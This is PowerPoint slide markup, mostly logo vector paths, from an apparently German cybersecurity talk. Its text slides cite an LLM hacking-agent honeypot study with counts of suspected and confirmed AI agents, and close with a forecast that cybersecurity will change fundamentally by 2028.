                    <a:pt x="3676675" y="732155"/>
                    <a:pt x="3630170" y="749825"/>
                    <a:pt x="3563206" y="749825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3454382" y="749825"/>
                    <a:pt x="3393942" y="697747"/>
                    <a:pt x="3393942" y="603815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3393942" y="549872"/>
                    <a:pt x="3414402" y="508970"/>
                    <a:pt x="3452529" y="483862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3479488" y="467124"/>
                    <a:pt x="3525078" y="457833"/>
                    <a:pt x="3587372" y="457833"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3649691" y="459686"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3657129" y="459686"/>
                    <a:pt x="3686880" y="461552"/>
                    <a:pt x="3702694" y="462463"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3702694" y="442018"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3702694" y="409462"/>
                    <a:pt x="3699927" y="399230"/>
                    <a:pt x="3690611" y="388076"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3677589" y="374114"/>
                    <a:pt x="3651570" y="366677"/>
                    <a:pt x="3612503" y="366677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3605065" y="366677"/>
                    <a:pt x="3597628" y="366677"/>
                    <a:pt x="3590190" y="367618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3554829" y="372259"/>
                    <a:pt x="3543685" y="383415"/>
                    <a:pt x="3539954" y="420619"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3430216" y="420619"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3433922" y="312734"/>
                    <a:pt x="3485098" y="270888"/>
                    <a:pt x="3615295" y="270888"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2404018" y="269903"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2464433" y="269903"/>
                    <a:pt x="2504439" y="286662"/>
                    <a:pt x="2547213" y="331283"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2547213" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="282943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2718330" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="384314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2654158" y="692121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2654158" y="785132"/>
                    <a:pt x="2644867" y="826977"/>
                    <a:pt x="2616030" y="866968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2578842" y="918134"/>
                    <a:pt x="2518376" y="941357"/>
                    <a:pt x="2423513" y="941357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2284025" y="941357"/>
                    <a:pt x="2230083" y="899512"/>
                    <a:pt x="2226352" y="789773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2336114" y="789773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342638" y="831637"/>
                    <a:pt x="2363987" y="844657"/>
                    <a:pt x="2423513" y="844657"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2476542" y="844657"/>
                    <a:pt x="2505379" y="830695"/>
                    <a:pt x="2522107" y="797229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2533251" y="774899"/>
                    <a:pt x="2536069" y="754443"/>
                    <a:pt x="2536069" y="705141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2536069" y="688403"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2492356" y="724675"/>
                    <a:pt x="2456057" y="737714"/>
                    <a:pt x="2401201" y="737714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2275648" y="737714"/>
                    <a:pt x="2191955" y="646557"/>
                    <a:pt x="2191955" y="507983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2191955" y="476381"/>
                    <a:pt x="2196626" y="445691"/>
                    <a:pt x="2204978" y="416857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2231936" y="325711"/>
                    <a:pt x="2307278" y="269903"/>
                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2536564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5C4A9-81CE-EBB2-DA3C-D7F82DA59A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678162-8EE8-C091-D764-11DDCAD022A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686475" y="487656"/>
            <a:ext cx="9360000" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>LLM-Hack Agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Honeypot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1"/>
              <a:t>Reworr,Dmitrii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0"/>
              <a:t>, 2025)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechteck 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77B36F4-FE8A-48DA-F46D-0AA43A01D0AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705525" y="2744924"/>
            <a:ext cx="3240000" cy="18225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1440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>9 Potentielle</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>AI Agenten</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechteck 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092B12F9-B624-DD7F-CB60-8AFA5E32C6AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4476000" y="2744924"/>
            <a:ext cx="3240000" cy="1822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1440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>2 Bestätigte</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>AI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Agenten</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="de-DE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="A1 Sans"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rechteck 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853CE17D-2AFA-EF9F-F519-F4A025EAFC8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8256675" y="2744924"/>
            <a:ext cx="3240000" cy="18225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1440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Dunkelziffer vielfaches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C97546B2-4EFB-E969-288D-EF76D22B0DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114654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49F77-8DAD-985A-F3B8-1746E746B5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0E4902F-05F2-B761-2544-74FAB484F4AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24680" y="0"/>
            <a:ext cx="12097344" cy="4401108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="de-DE" sz="8000" dirty="0"/>
              <a:t>Bis 2028 wird sich Cybersicherheit grundlegend</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="8000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="8000" dirty="0"/>
              <a:t>geändert haben</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textfeld 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E3778B-FDCC-681D-BBCE-FF5B59448C80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-72008" y="4005064"/>
            <a:ext cx="12192000" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Sind Sie bereit?</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="8000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BE2E136-6AD9-3BB8-8C3D-763AB9977E32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6654963" y="5642268"/>
            <a:ext cx="5417701" cy="1169916"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freihandform: Form 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE21A64B-E5F1-2000-79DC-9E9DC0E25845}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freihandform: Form 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4669D34D-E43D-7F60-5199-91BAF7BE2A57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
